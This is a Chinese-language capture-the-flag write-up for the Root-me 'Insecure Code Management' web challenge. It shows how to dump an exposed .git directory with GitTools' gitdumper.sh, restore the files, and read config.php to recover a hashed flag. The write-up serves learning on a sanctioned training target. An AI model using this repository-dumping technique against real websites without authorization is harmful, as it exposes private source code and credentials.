[Root-me]Insecure Code Management Writeup

个人博客地址

http://www.darkerbox.com

欢迎大家学习交流

Root-me网址:

https://www.root-me.org/en/Challenges/Web-Server/Insecure-Code-Management

知识点

  • git文件泄露

。。。

既然是git文件泄露,就需要泄露的工具了:https://github.com/internetwache/GitTools

安装好后,进入Dumper文件夹。
输入命令
结果保存在chr文件夹

./gitdumper.sh http://challenge01.root-me.org/web-serveur/ch61/.git/ /root/Desktop/chr

cd /root/Desktop/chr/
git status .git/

[Root-me]Insecure Code Management Writeup_第1张图片
git status 命令用来查看git目录下的文件状态,
具体的又得看一下git的过程了。

https://www.jianshu.com/p/37f3a7e4a193

[Root-me]Insecure Code Management Writeup_第2张图片
使用git status 可以看出是未使用git add 缓存代码的。所以执行

git checkout -- .

[Root-me]Insecure Code Management Writeup_第3张图片

git log

[Root-me]Insecure Code Management Writeup_第4张图片
执行

git log


看到加密方式是sha256

查看index.php

查看config.php

在这里插入图片描述
找到了加密后的值。即flag。git命令也没有深入了解过,过程也有点懵,得好好看看git了。

[Root-me]Insecure Code Management Writeup_第5张图片

[Root-me]Insecure Code Management Writeup_第6张图片

欢迎大家一起学习交流,共同进步,欢迎加入信息安全小白群

在这里插入图片描述

你可能感兴趣的:(Rootme)